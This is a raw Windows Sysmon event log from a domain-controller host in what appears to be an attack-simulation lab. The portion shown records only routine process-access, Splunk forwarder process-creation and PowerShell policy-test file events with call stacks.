10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5900-000000009101}2920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8553-5FCF-5900-000000009101}2920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.438{10ACEC4A-8553-5FCF-5900-000000009101}2920C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.414{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.398{10ACEC4A-8553-5FCF-5800-000000009101}15203812C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.211{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.211{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.180{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_q25jnzw4.skh.ps12020-12-08 13:53:23.180 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8553-5FCF-5800-000000009101}1520C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 